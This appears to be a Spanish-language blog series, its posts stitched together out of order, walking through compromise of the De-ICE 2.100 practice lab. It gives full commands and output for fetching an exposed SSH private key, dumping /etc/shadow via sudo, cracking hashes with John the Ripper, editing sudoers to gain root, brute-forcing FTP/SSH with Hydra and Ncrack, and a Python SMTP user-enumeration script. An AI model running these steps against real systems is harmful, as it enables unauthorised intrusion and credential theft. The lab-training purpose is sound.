Veamos ahora que podemos hacer con la información encontrada:

Index of /~pirrip//.ssh

 Name                    Last modified      Size  Description
 Parent Directory                             -
 id_rsa                  05-Jan-2008 20:29  1.6K
 id_rsa.pub              05-Jan-2008 20:29  393

Esta información corresponde a la llave digital de acceso del usuario pirrip, muy posiblemente al realizarse la copia de seguridad previa a la migración del sistema, esta se olvidó en el antiguo server.

Descarguemos los archivos:

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
–2010-06-01 02:11:32–  http://192.168.2.101/~pirrip//.ssh/id_rsa.pub
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 393 [text/plain]
Saving to: `id_rsa.pub’

100%[===========================================================>] 393         –.-K/s   in 0s

2010-06-01 02:11:32 (44.7 MB/s) – `id_rsa.pub’ saved [393/393]

root@Sec-Track:~/De-Ice2.100# wget http://192.168.2.101/~pirrip//.ssh/id_rsa
–2010-06-01 02:11:46–  http://192.168.2.101/~pirrip//.ssh/id_rsa
Connecting to 192.168.2.101:80… connected.
HTTP request sent, awaiting response… 200 OK
Length: 1675 (1.6K) [text/plain]
Saving to: `id_rsa’

100%[===========================================================>] 1,675       –.-K/s   in 0s

2010-06-01 02:11:46 (172 MB/s) – `id_rsa’ saved [1675/1675]

root@Sec-Track:~/De-Ice2.100# ls
id_rsa  id_rsa.pub

Una vez descargadas las llaves, procedemos a copiarlas al directorio /foo/.ssh

root@Sec-Track:~/De-Ice2.100# cp id* /root/.ssh/

root@Sec-Track:~/.ssh# ls
id_rsa  id_rsa.pub  known_hosts

Confirmamos que la llave corresponde al usuario pirrip

root@Sec-Track:~/.ssh# more id_rsa.pub
ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA1pfb/CVukUw4Xe67YLEZzVHWNax0zJjI1CfcsoEGylmm
tlA6iXHi41nLshzXu9n536JfM9LFAWGqefBVX7Bzd/fC4+jHS3q89IK9FP7gFPwEmlNHCwPX0ADxDFyB
1lJOFffJ9gVw3VgHCaCPgS70UqJD0hZFDMSDMoBa91PylFQR0m58nMq8DsGRbeC5hTdpLXKfBuW8v/lF
uNEWVWNcZDie82aiJg8WRUUIrzeGZSR3+cG1hi6za67VIi+ce8fFuBvIgaEpvJ0JSIX7zPLUV10ezW1N
QRNplKSam3TIYI3+YwuhlcgpEyliHYReN6v91+um2c6LNy9y/vx2Akci5Q== pirrip@slax

Por lo tanto realicemos la conexión al sistema objetivo!!

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
The authenticity of host ’192.168.2.100 (192.168.2.100)’ can’t be established.
RSA key fingerprint is ab:ab:a8:ad:a2:f2:fd:c2:6f:05:99:69:40:54:ec:10.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added ’192.168.2.100′ (RSA) to the list of known hosts.
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@         WARNING: UNPROTECTED PRIVATE KEY FILE!          @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for ‘/root/.ssh/id_rsa’ are too open.
It is recommended that your private key files are NOT accessible by others.
This private key will be ignored.
bad permissions: ignore key: /root/.ssh/id_rsa
pirrip@192.168.2.100′s password:

Como vemos las llaves presentan un error de permisos… Por lo tanto cambiemos estos:

root@Sec-Track:~/.ssh# ls -la
total 20
drwx——  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
-r–r–r– 1 root root 1675 Jun  1 02:17 id_rsa
-r–r–r– 1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r–r–  1 root root 1768 Jun  1 02:21 known_hosts
root@Sec-Track:~/.ssh# chmod 000 id*
root@Sec-Track:~/.ssh# ls -la
total 20
drwx——  2 root root 4096 Jun  1 02:18 .
drwxr-xr-x 77 root root 4096 Jun  1 02:09 ..
———- 1 root root 1675 Jun  1 02:17 id_rsa
———- 1 root root  393 Jun  1 02:17 id_rsa.pub
-rw-r–r–  1 root root 1768 Jun  1 02:21 known_hosts

Ahora si… Conectémonos al host

root@Sec-Track:~/.ssh# ssh pirrip@192.168.2.100
Linux 2.6.16.
pirrip@slax:~$

Muy bien… Ya estamos dentro del sistema objetivo… Ahora como en  todos los Test de Penetración que hemos realizado, tratemos de escalar privilegios.

pirrip@slax:~$ cat /etc/passwd
root :0:0::/root:/bin/bash
bin:x:1:1:bin:/bin:
daemon:x:2:2:daemon:/sbin:
adm:x:3:4:adm:/var/log:
lp:x:4:7:lp:/var/spool/lpd:
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/:
news:x:9:13:news:/usr/lib/news:
uucp:x:10:14:uucp:/var/spool/uucppublic:
operator:x:11:0:operator:/root:/bin/bash
games:x:12:100:games:/usr/games:
ftp:x:14:50::/home/ftp:
smmsp:x:25:25:smmsp:/var/spool/clientmqueue:
mysql:x:27:27:MySQL:/var/lib/mysql:/bin/bash
rpc:x:32:32:RPC portmap user:/:/bin/false
sshd:x:33:33:sshd:/:
gdm:x:42:42:GDM:/var/state/gdm:/bin/bash
pop:x:90:90:POP:/:
nobody:x:99:99:nobody:/:
pirrip :1000:10 hilip Pirrip:/home/pirrip:/bin/bash
magwitch :1001:100:Abel Magwitch:/home/magwitch:/bin/bash
havisham :1002:100:Estella Havisham:/home/havisham:/bin/bash

Vemos como nuestro usuario pirrip tiene el ID 10… Comprobemos entonces los grupos.

pirrip@slax:/tmp$ cat /etc/group
root::0:root
bin::1:root,bin,daemon
daemon::2:root,bin,daemon
sys::3:root,bin,adm
adm::4:root,adm,daemon
tty::5:
disk::6:root,adm
lp::7:lp
mem::8:
kmem::9:
wheel::10:root
floppy::11:root
mail::12:mail
news::13:news
uucp::14:uucp
man::15:
audio::17:
video::18:
cdrom::19:
games::20:
slocate::21:
utmp::22:
smmsp::25:smmsp
mysql::27:
rpc::32:
sshd::33:sshd
gdm::42:
shadow::43:
ftp::50:
pop::90:pop
scanner::93:
nobody::98:nobody
nogroup::99:
users::100:
console::101:

Por lo tanto podremos utilizar el comando sudo

pirrip@slax:/tmp$ cat /etc/shadow
cat: /etc/shadow: Permission denied

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Lamentablemente desconocemos nuestro password.

Ahora observaremos en detalle la versión del sistema objetivo y trataremos identificar alguna vulnerabilidad reportada, ubicar algún exploit y ejecutarlo desde la carpeta /tmp

pirrip@slax:~$ uname -r
2.6.16
pirrip@slax:~$ cd /tmp/
You have mail in /var/mail/pirrip

Para nuestra sorpresa, cuando decidí cambiarme a la carpeta /tmp recibí el mensaje de que tengo un email … Veamos de que se trata

pirrip@slax:/tmp$ mail
mailx version nail 11.25 7/29/05.  Type ? for help.
“/var/mail/pirrip”: 7 messages 7 unread
>U  1 Abel Magwitch      Sun Jan 13 23:53   21/758   Estella
U  2 Estella Havisham   Sun Jan 13 23:53   21/790   welcome to the team
U  3 Abel Magwitch      Sun Jan 13 23:53   21/885   havisham
U  4 Estella Havisham   Mon Jan 14 00:05   21/871   next month
U  5 Abel Magwitch      Mon Jan 14 00:05   21/878   vacation
U  6 Abel Magwitch      Mon Jan 14 00:05   21/925   vacation
U  7 noreply@fermion.he Mon Jan 14 00:05   30/993   Fermion Account Login Reminder
? 1
Message  1:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:47:48 +0000
To: pirrip@slax.example.net
Subject: Estella
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Will do.

?
Message  2:
From havisham@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Sun, 13 Jan 2008 23:50:33 +0000
To: pirrip@slax.example.net
Subject: welcome to the team
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Thanks!  Glad to be here.

?
Message  3:
From magwitch@slax.example.net  Sun Jan 13 23:53:37 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:48:57 +0000
To: pirrip@slax.example.net
Subject: havisham
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

I set her up with an accountus servers.  I set her password to “changeme” and will swing by tomorrow and make sure she changes her pw.

?
Message  4:
From havisham@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <havisham@slax.example.net>
From: Estella Havisham <havisham@slax.example.net>
Date: Mon, 14 Jan 2008 00:03:56 +0000
To: pirrip@slax.example.net
Subject: next month
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Abel filled me in about next month.  I wanted to ask you if I can grab the week you get back for vacation?  Thanks.

?
Message  5:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:55:41 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Hey, I’ll be taking vacation the second week of next month.  Have any additional tasks that need to be taen care of in advance?

?
Message  6:
From magwitch@slax.example.net  Mon Jan 14 00:05:15 2008
Return-Path: <magwitch@slax.example.net>
From: Abel Magwitch <magwitch@slax.example.net>
Date: Sun, 13 Jan 2008 23:58:28 +0000
To: pirrip@slax.example.net
Subject: vacation
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Sure – so far, she’s doing just fine.  I have assigned her a couple web issues and the ftp installation for 2.100.  She seems to be very comfortable, even with the new stuff.

?
Message  7:
From noreply@fermion.herot.net  Mon Jan 14 00:05:15 2008
Return-Path: <noreply@fermion.herot.net>
From: noreply@fermion.herot.net
Date: Sun, 13 Jan 2008 23:54:42 +0000
To: pirrip@slax.example.net
Subject: Fermion Account Login Reminder
User-Agent: nail 11.25 7/29/05
Content-Type: text/plain; charset=us-ascii
Status: RO

Fermion Account Login Reminder

Listed below are your Fermion Account login credentials.  Please let us know if you have any questions or problems.

Regards,
Fermion Support

E-Mail: pirrip@slax.example.net
Password: 0l1v3rTw1st

Vemos que interesante información nos encontramos en el email 7 y 3 … Nuestro password y el de havisham!!

Intentemos nuevamente listar el contenido de passwd

pirrip@slax:/tmp$ sudo cat /etc/shadow

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.

Password:

Sorry, user pirrip is not allowed to execute ‘/usr/bin/cat /etc/shadow’ as root on slax.

Parece que no tenemos disponible el comando cat.. Comprobemos entonces que comandos interesantes y de utilidad tenemos…

pirrip@slax:/tmp$ sudo bash
Sorry, user pirrip is not allowed to execute ‘/usr/bin/bash’ as root on slax.
pirrip@slax:/tmp$ sudo sh
Sorry, user pirrip is not allowed to execute ‘/bin/sh’ as root on slax.
pirrip@slax:/tmp$ sudo ls
Sorry, user pirrip is not allowed to execute ‘/usr/bin/ls’ as root on slax.
pirrip@slax:/tmp$ sudo nano
sudo: nano: command not found
pirrip@slax:/tmp$ sudo more
usage: more [-dflpcsu] [+linenum | +/pattern] name1 name2 …
pirrip@slax:/tmp$ sudo vi

Perfecto, a pesar de no tener disponibles la mayoría de comandos, si tenemos disponibles 2 muy importantes!!! more y vi . Veamos que podemos hacer con estos.

pirrip@slax:/tmp$ sudo more /etc/shadow
Password:
root:$1$/Ta1Q0lT$CSY9sjWR33Re2h5ohV4MX/:13882:0:::::
bin:*:9797:0:::::
daemon:*:9797:0:::::
adm:*:9797:0:::::
lp:*:9797:0:::::
sync:*:9797:0:::::
shutdown:*:9797:0:::::
halt:*:9797:0:::::
mail:*:9797:0:::::
news:*:9797:0:::::
uucp:*:9797:0:::::
operator:*:9797:0:::::
games:*:9797:0:::::
ftp:*:9797:0:::::
smmsp:*:9797:0:::::
mysql:*:9797:0:::::
rpc:*:9797:0:::::
sshd:*:9797:0:::::
gdm:*:9797:0:::::
pop:*:9797:0:::::
nobody:*:9797:0:::::
pirrip:$1$KEj04HbT$ZTn.iEtQHcLQc6MjrG/Ig/:13882:0:99999:7:::
magwitch:$1$qG7/dIbT$HtTD946DE3ITkbrCINQvJ0:13882:0:99999:7:::
havisham:$1$qbY1hmdT$sVZn89wKvmLn0wP2JnZay1:13882:0:99999:7:::

Genial… Llevemos estos resultados a la herramienta de password cracking John The Ripper.

root@Sec-Track:/pentest/passwords/jtr# ./john –user=root –w=/root/passwords/verycool.lst 100.txt
Loaded 1 password hash (FreeBSD MD5 [32/32])
guesses: 0  time: 0:00:08:49 100.00% (ETA: Tue Jun  1 04:48:21 2010)  c/s: 4526  trying: aceguero

Lamentablemente no hemos dado con el password de root… Posiblemente sea un password complejo que no se encuentra incluido en nuestro diccionario.

Poniendo a prueba nuestra creatividad, veamos lo que podemos hacer con el comando vi sobre sudo.

pirrip@slax:/tmp$ sudo vi /etc/sudoers
Password:
reading /etc/sudoers

Allí modifico los permisos para nuestro usuario pirrip

# User privilege specification
root    ALL=(ALL) ALL
pirrip  ALL=(ALL) ALL

Ahora tenemos todos los permisos de sudo para ejecutar cualquier comando… Incluyendo el siguiente!!

pirrip@slax:/tmp$ sudo passwd root
Changing password for root
Enter the new password (minimum of 5, maximum of 127 characters)
Please use a combination of upper and lower case letters and numbers.
New password: ***********
Re-enter new password: ***********
Password changed.

Ahora solo basta:

pirrip@slax:/tmp$ su
Password: ***********
root@slax:/tmp#

Para el próximo post veremos algunos otros métodos para comprometer este sistema…

Una vez hemos identificado los usarios válidos en el sistema, pasemos a realizar algunas pruebas de autenticación  a través de los servicios ofrecidos por el host. Veamos:

FTP

Hydra:

root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36

SSH

Hydra:

root@bt:~# hydra 192.168.2.100 ftp -s 21 -L usuarios.txt -P /pentest/passwords/wordlists/dicc.lst -t 36

Ncrack:

root@bt:/usr/local/share/ncrack# ncrack 192.168.1.100:22 -P /pentest/passwords/wordlists/pass.txt

Después de mucho esperar mientras se llevaba a cabo los intentos de inicio de sesión con un usuario y password válido llegamos a la conclusión de que este no es un camino viable para acceder al sistema, pues las pruebas fueron realizadas con diccionarios en un comienzo básicos y compuestos por palabras comunes hasta diccionarios bastante robustos de millones de palabras, por lo tanto podemos afirmar que las contraseñas son complejas o los mecanismos de autenticación están medianamente asegurados.

Hagamos uso de varios identificadores de vulnerabilidades, configuraciones por defecto o archivos y directorios sensibles. Para ello primero usemos OWASP Dirbuster para identificar directorios y archivos.

Host 192.168.2.100

root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.100/ -r
DirBuster: option requires an argument — r
Starting OWASP DirBuster 0.12 in headless mode
Starting dir/file list based brute forcing
Dir found: / – 200
Dir found: /cgi-bin/ – 403
Dir found: /icons/ – 200
File found: /level.html – 200
File found: /copyright.txt – 200
File found: /index2.html – 200

Host 192.168.2.101

root@bt:/pentest/web/dirbuster# java -jar DirBuster-0.12.jar -H -u http://192.168.2.101/ -r
DirBuster: option requires an argument — r
Starting OWASP DirBuster 0.12 in headless mode
Starting dir/file list based brute forcing
Dir found: / – 200
Dir found: /cgi-bin/ – 403
Dir found: /home/ – 403
Dir found: /icons/ – 200
File found: /200711_002.pdf – 200
File found: /200611_001.pdf – 200
File found: /200711_004.pdf – 200
File found: /Acceptable_Use_Policy.pdf – 200
File found: /Audit_Policy.pdf – 200
File found: /Email_Policy.pdf – 200

Ahora con Nikto en modo default

Host 192.168.2.100

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.100
- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.2.100
+ Target Hostname:    slax.example.net
+ Target Port:        80
+ Start Time:         2010-03-13 17:14:41
—————————————————————————
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-0: DEBUG HTTP verb may show server debugging information
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-12184: /index.php?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000: PHP reveals potentially sensitive information via certain HTTP requests which contain specific QUERY strings.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3588 items checked: 8 item(s) reported on remote host
+ End Time:           2010-03-13 17:15:08 (27 seconds)
—————————————————————————
+ 1 host(s) tested

Host 192.168.2.101

root@bt:/pentest/web/nikto# perl nikto.pl -h 192.168.2.101
- Nikto v2.1.0
—————————————————————————
+ Target IP:          192.168.2.101
+ Target Hostname:    192.168.2.101
+ Target Port:        80
+ Start Time:         2010-03-13 17:16:25
—————————————————————————
+ Server: Apache/2.0.55 (Unix) PHP/5.1.2
+ OSVDB-0: Apache/2.0.55 appears to be outdated (current is at least Apache/2.2.14). Apache 1.3.41 and 2.0.63 are also current.
+ OSVDB-0: PHP/5.1.2 appears to be outdated (current is at least 5.2.8)
+ OSVDB-0: Allowed HTTP Methods: GET, HEAD, POST, OPTIONS, TRACE
+ OSVDB-877: HTTP TRACE method is active, suggesting the host is vulnerable to XST
+ OSVDB-637: /~root/: Allowed to browse root’s home directory.
+ OSVDB-3268: /icons/: Directory indexing is enabled: /icons
+ OSVDB-3233: /icons/README: Apache default file found.
+ 3588 items checked: 7 item(s) reported on remote host
+ End Time:           2010-03-13 17:16:54 (29 seconds)
—————————————————————————
+ 1 host(s) tested

Además de las alertas sobre las versiones desactualizadas de software, podemos destacar la identificación del directorio de usuario root. (~root). Esto nos permite deducir que posiblemente existan diferentes directorios para los usuarios identificados. Veamos:

Con netcat

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~root/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:36:11 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 557
Connection: close
Content-Type: text/html

…

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~pirrip/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:38:13 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 561
Connection: close
Content-Type: text/html

…

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~magwitch/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:40:13 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 565
Connection: close
Content-Type: text/html

…

root@bt:/pentest/web/nikto# nc -v 192.168.2.101 80
192.168.2.101: inverse host lookup failed: Unknown server error : Connection timed out
(UNKNOWN) [192.168.2.101] 80 (www) open
GET /~havisham/ HTTP/1.0

HTTP/1.1 200 OK
Date: Fri, 12 Mar 2010 17:42:27 GMT
Server: Apache/2.0.55 (Unix) PHP/5.1.2
Content-Length: 565
Connection: close
Content-Type: text/html

Otra herramienta que nos permite identificar posibles usuarios, archivos, directorios en un host, es la herramienta de Fuzzing JBroFuzz

Veamos:

Tenemos los posibles usuarios válidos del sistema:

pickwick
winkle
snodgrass
tupman
weller
tweller
havisham
magwitch
pirrip
nickleby
rnickleby
noggs
squeers
pinch
tapley
gamp
marley
scrooge
cratchit
sikes
dawkins
claypole
root

Los cuales a su vez pueden tener un directorio como el identificado para root

Basta entonces con agregarle el símbolo virgulilla (~) al comienzo de cada uno y anexarlo a las listas de fuzzing de  JBroFuzz.

0,http://192.168.2.101/~pickwick,404,Not Found,No,No
1,http://192.168.2.101/~winkle,404,Not Found,No,No
2,http://192.168.2.101/~snodgrass,404,Not Found,No,No
3,http://192.168.2.101/~tupman,404,Not Found,No,No
4,http://192.168.2.101/~weller,404,Not Found,No,No
5,http://192.168.2.101/~tweller,404,Not Found,No,No
6,http://192.168.2.101/~havisham,200,OK,No,No
7,http://192.168.2.101/~magwitch,200,OK,No,No
8,http://192.168.2.101/~pirrip,200,OK,No,No
9,http://192.168.2.101/~nickleby,404,Not Found,No,No
10,http://192.168.2.101/~rnickleby,404,Not Found,No,No
11,http://192.168.2.101/~noggs,404,Not Found,No,No
12,http://192.168.2.101/~squeers,404,Not Found,No,No
13,http://192.168.2.101/~pinch,404,Not Found,No,No
14,http://192.168.2.101/~tapley,404,Not Found,No,No
15,http://192.168.2.101/~gamp,404,Not Found,No,No
16,http://192.168.2.101/~marley,404,Not Found,No,No
17,http://192.168.2.101/~scrooge,404,Not Found,No,No
18,http://192.168.2.101/~cratchit,404,Not Found,No,No
19,http://192.168.2.101/~sikes,404,Not Found,No,No
20,http://192.168.2.101/~dawkins,404,Not Found,No,No
21,http://192.168.2.101/~claypole,404,Not Found,No,No
22,http://192.168.2.101/~root,200,OK,No,No

Las líneas que están en negrita corresponden a ubicaciones reales y activas en el servidor objetivo

~havisham
~magwitch
~pirrip
~root

Hagamos ahora una exploración de directorios y archivos mediante JBroFuzz a los directorios raíz del server y de los usuarios identificados.

Al host 192.168.2.100

4,http://192.168.2.100//icons/,200,OK,No,No
784,http://192.168.2.100//index.php/123,200,OK,No,No
802,http://192.168.2.100//info.php,200,OK,No,No (Y)

Al host 192.1682.101

4,http://192.168.2.101//icons/,200,OK,No,No

Ahora a los directorios identificados para los usuarios:

Usuario havisham:

Ningún resultado de interés

Usuario magwitch:

Ningún resultado de interés

Usuario pirrip:

385,http://192.168.2.101/~pirrip//.ssh,200,OK,No,No

Usuario root:

Ningún resultado de interés

Vemos entonces como pudimos identificar la existencia del directorio .ssh para el usuario pirrip

http://192.168.2.101/~pirrip//.ssh/

Index of /~pirrip//.ssh

 Name                    Last modified      Size  Description
 Parent Directory                             -
 id_rsa                  05-Jan-2008 20:29  1.6K
 id_rsa.pub              05-Jan-2008 20:29  393

En el próximo post veremos como podemos utilizar la información obtenida para penetrar el sistema.

Una vez hemos escaneado e identificados los servicios disponibles en los sistemas objetivos vamos a enumerar los posibles usuarios de estos.

Tenemos entonces dos host objetivos con los siguientes servicios y versiones disponibles:

192.168.2.100

21/tcp  open   ftp      vsftpd 2.0.4
22/tcp  open   ssh      OpenSSH 4.3 (protocol 1.99)
25/tcp  open   smtp     Sendmail 8.13.7/8.13.7
80/tcp  open   http     Apache httpd 2.0.55 ((Unix) PHP/5.1.2)
110/tcp open   pop3     Openwall popa3d
143/tcp open   imap     UW imapd 2004.357
443/tcp closed https

192.168.2.101

80/tcp open  http    Apache httpd 2.0.55 ((Unix) PHP/5.1.2)

Realicemos una exploración manual al sitio web 192.168.2.100 en busca de información sensible o de interés para nuestros propósitos:

En el sitio web podemos encontrarnos un directorio de personas involucradas con la empresa:

Development:
Samuel Pickwick – pickwick@herot.net
Nathaniel Winkle – winkle@herot.net
Augustus Snodgrass – snodgrass@herot.net
Tracy Tupman – tupman@herot.net
Sam Weller – weller@herot.net
Tony Weller – tweller@herot.net
Estella Havisham – havisham@herot.net
Abel Magwitch – magwitch@herot.net
Philip Pirrip – pirrip@herot.net

Testing:
Nicholas Nickleby – nickleby@herot.net
Ralph Nickleby – rnickleby@herot.net
Newman Noggs – noggs@herot.net
Wackford Squeers – squeers@herot.net
Thomas Pinch – pinch@herot.net
Mark Tapley – tapley@herot.net
Sarah Gamp – gamp@herot.net

Marketing:
Jacob Marley – marley@herot.net
Ebenezer Scrooge – scrooge@herot.net
Bob Cratchit – cratchit@herot.net

Human Resources:
Bill Sikes – sikes@herot.net
Jack Dawkins – dawkins@herot.net
Noah Claypole – claypole@herot.net

Posiblemente estos sean usuarios válidos en el sistema y pueda realizarse un inicio de sesión en alguno de los servicios disponibles en el sistema.

Ahora exploremos el host 192.168.2.101.

En este nos encontramos una serie de políticas de uso/configuración de aplicaciones/actividades relacionadas con la administración y la seguridad del servidor.

• Software Installation Policy
• Server Malware Protection Policy
• Employee Internet Use Monitoring and Filtering Policy”
• Acceptable Use Policy
• Audit Vulnerability Scan Policy
• Email Policy

Tratemos entonces de autenticarnos en alguno de los servicios disponibles haciendo uso del listado de posibles usuarios con passwords comunes/blanco/mismo-nombre-usuario.

Primero depuremos el listado de posibles usuarios:

pickwick
winkle
snodgrass
tupman
weller
tweller
havisham
magwitch
pirrip
nickleby
rnickleby
noggs
squeers
pinch
tapley
gamp
marley
scrooge
cratchit
sikes
dawkins
claypole

Ahora identifiquemos y verfiquemos los usuarios reales del sistema.

Para esta actividad aplicaremos una técnica mostrada en un entorno anterior, pero ahora perfeccionada por Roguer (jollyroguer [at] gmail [dot] com)  quien ha desarrollado un script en python que automatizará esa consulta. Veamos:

#usensmtp.py

######usensmtp.py######
import getpass
import sys
import telnetlib

print “Welcome to usensmtp.py”
print “Created by Roguer”
host = raw_input(“Digite la ip del objetivo: “)
port = raw_input(“Digite el puerto del objetivo: “)
users_file = raw_input(“Digite el nombre del diccionario de usuarios: “)
tn = telnetlib.Telnet(host,port)
tn.write(“helo x” + “\n”)
tn.write(“mail from: roguer@slax.example.net” + “\n”)

#este valor puede cambiar para otros entornos
print tn.read_until(“Sender ok”,1)
inp = open(users_file,”r”)
for linea in inp.readlines():
tn.write(“rcpt to: “+ linea)
print tn.read_until(“User unknown”,0.1)
inp.close()
tn.write(“quit” + “\n”)
print “created by Roguer”
print “jollyroguer@gmail.com”
#### fin####

También podemos utilizar la herramienta smtp-user-enum que había mostrado en el primer entorno para los propósitos de enumeración de usuarios.

Los resultados arrojados por el script de Roguer son los siguientes:

root@bt: ~#python usensmtp.py
Welcome to usensmtp.py
Created by Roguer
Digite la ip del objetivo: 192.168.2.100
Digite el puerto del objetivo: 25
Digite el nombre del diccionario de usuarios: usuarios.txt
220 slax.example.net ESMTP Sendmail 8.13.7/8.13.7; Thu, 4 Mar 2010
08:07:24 GMT
250 slax.example.net Hello [192.168.2.10], pleased to meet you
250 2.1.0 roguer@slax.example.net… Sender ok
250 2.1.5 root… Recipient ok
550 5.1.1 pickwick… User unknown
550 5.1.1 winkle… User unknown
550 5.1.1 snodgrass… User unknown
550 5.1.1 tupman… User unknown
550 5.1.1 weller… User unknown
550 5.1.1 tweller… User unknown
250 2.1.5 havisham… Recipient ok
250 2.1.5 magwitch… Recipient ok
250 2.1.5 pirrip… Recipient ok
550 5.1.1 nickleby… User unknown
550 5.1.1 rnickleby… User unknown
550 5.1.1 noggs… User unknown
550 5.1.1 squeers… User unknown
550 5.1.1 pinch… User unknown
550 5.1.1 tapley… User unknown
550 5.1.1 gamp… User unknown
550 5.1.1 marley… User unknown
550 5.1.1 scrooge… User unknown
550 5.1.1 cratchit… User unknown
550 5.1.1 sikes… User unknown
550 5.1.1 dawkins… User unknown
550 5.1.1 claypole… User unknown
550 5.1.1 spickwick… User unknown
550 5.1.1 nwinkle… User unknown
550 5.1.1 asnodgrass… User unknown
550 5.1.1 ttupman… User unknown
550 5.1.1 sweller… User unknown
550 5.1.1 tweller… User unknown
550 5.1.1 ehavisham… User unknown
550 5.1.1 amagwitch… User unknown
550 5.1.1 ppirrip… User unknown
550 5.1.1 nnickleby… User unknown
550 5.1.1 rnickleby… User unknown
550 5.1.1 nnoggs… User unknown
550 5.1.1 wsqueers… User unknown
550 5.1.1 tpinch… User unknown
550 5.1.1 mtapley… User unknown
550 5.1.1 sgamp… User unknown
550 5.1.1 jmarley… User unknown
550 5.1.1 escrooge… User unknown
550 5.1.1 bcratchit… User unknown
550 5.1.1 bsikes… User unknown
550 5.1.1 jdawkins… User unknown
550 5.1.1 nclaypole… User unknown
550 5.1.1 samuel… User unknown
550 5.1.1 nathaniel… User unknown
550 5.1.1 augustus… User unknown
550 5.1.1 tracy… User unknown
550 5.1.1 sam… User unknown
550 5.1.1 tony… User unknown
550 5.1.1 estella… User unknown
550 5.1.1 abel… User unknown
550 5.1.1 philip… User unknown
550 5.1.1 nicholas… User unknown
550 5.1.1 ralph… User unknown
550 5.1.1 newman… User unknown
550 5.1.1 wackford… User unknown
550 5.1.1 thomas… User unknown
550 5.1.1 mark… User unknown
550 5.1.1 sarah… User unknown
550 5.1.1 jacob… User unknown
550 5.1.1 ebenezer… User unknown
550 5.1.1 bob… User unknown
550 5.1.1 bill… User unknown
550 5.1.1 jack… User unknown
550 5.1.1 noah… User unknown
550 5.1.1 samuelp… User unknown
550 5.1.1 nathanielw… User unknown
550 5.1.1 augustuss… User unknown
550 5.1.1 tracyt… User unknown
550 5.1.1 samw… User unknown
550 5.1.1 tonyw… User unknown
550 5.1.1 estellah… User unknown
550 5.1.1 abelm… User unknown
550 5.1.1 philipp… User unknown
550 5.1.1 nicholasn… User unknown
550 5.1.1 ralphn… User unknown
550 5.1.1 newmann… User unknown
550 5.1.1 wackfords… User unknown
